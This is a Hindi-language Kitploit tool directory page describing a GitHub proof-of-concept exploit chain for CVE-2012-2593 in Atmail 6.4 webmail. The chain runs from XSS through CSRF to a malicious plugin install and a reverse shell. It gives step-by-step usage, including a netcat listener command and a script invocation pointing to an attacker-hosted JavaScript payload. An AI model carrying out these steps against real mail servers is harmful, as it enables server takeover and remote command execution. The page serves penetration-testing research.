Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2012-2593 — Atmail XSS-CSRF-RCE Exploit Chain | Kitploit
उपकरण/GitHubGitHub/andrewtrube/cve-2012-2593
शोषण फ्रेमवर्कपेलोड जनरेशनशोषणशेलकोडवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगपेलोड डेवलपमेंट
GitHubandrewtrube/cve-2012-2593

CVE-2012-2593

Atmail XSS-CSRF-RCE Exploit Chain

रिपॉजिटरी देखें
4 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Atmail XSS-CSRF-RCE एक्सप्लॉइट चेन PoC

atmail-rce.py: Atmail के वेबमेल इंटरफ़ेस में CVE-2012-2593 का शोषण करता है।

atmail-csrf.js: जावास्क्रिप्ट फ़ाइल जो CVE 2012-2593 को CSRF में बदलती है जो एक दुर्भावनापूर्ण प्लगइन स्थापित करती है जो रिवर्स शेल निष्पादित करता है।

Plugin.php: स्थापित किया जाने वाला Atmail प्लगइन जो रिवर्स शेल को कॉल करता है।

!!केवल उन सर्वरों पर उपयोग करें जिन पर आपके पास परीक्षण की अनुमति है

सारांश

Atmail ईमेल सर्वर संस्करण 6.4 में Date ईमेल हेडर और ईमेल बॉडी (iFrame इंजेक्शन के माध्यम से) दोनों में XSS भेद्यता है। इसे जावास्क्रिप्ट XHR API का उपयोग करके CSRF में बदल दिया जाता है ताकि प्रशासक उपयोगकर्ता के कुकी के साथ प्रशासक वेबपैनल पर अनुरोध भेजा जा सके, जो एक दुर्भावनापूर्ण प्लगइन स्थापित करता है जो रिवर्स शेल के लिए कोड निष्पादित करता है।

प्रमाण की अवधारणा

  1. नेटकैट लिस्टनर शुरू करें nc -lvp 4444
  2. Plugin.php खोलें और IP पता और पोर्ट को अपने नेटकैट लिस्टनर में बदलें।
  3. gzip का उपयोग करके Plugin को संपीड़ित करें और base64 में एनकोड करें। gzip -c Plugin.php | base64 | tr -d [:space:]
  4. उपरोक्त आउटपुट को कॉपी करें और atmail-csrf.js डेटा वेरिएबल में पेस्ट करें।
  5. atmail-rce.py स्क्रिप्ट चलाएँ। python3 ./atmail-rce.py -u attacker@localhost -r admin@localhost -x http://attacker.com/malicious.js -t http://atmail.com/
  6. तब तक प्रतीक्षा करें जब तक प्रशासक उपयोगकर्ता अपने ईमेल में लॉग इन न कर ले।

चेतावनियाँ

  • केवल तब काम करता है जब XSS का लक्ष्य Atmail का प्रशासक उपयोगकर्ता हो।
  • केवल तब काम करता है जब लक्ष्य सर्वर के वेबमेल इंटरफ़ेस और प्रशासक इंटरफ़ेस दोनों में साइन इन हो।
  • केवल तब काम करता है यदि सर्वर पर प्लगइन स्थापना की अनुमति है (डिफ़ॉल्ट रूप से चालू)।
टूल डाउनलोड करें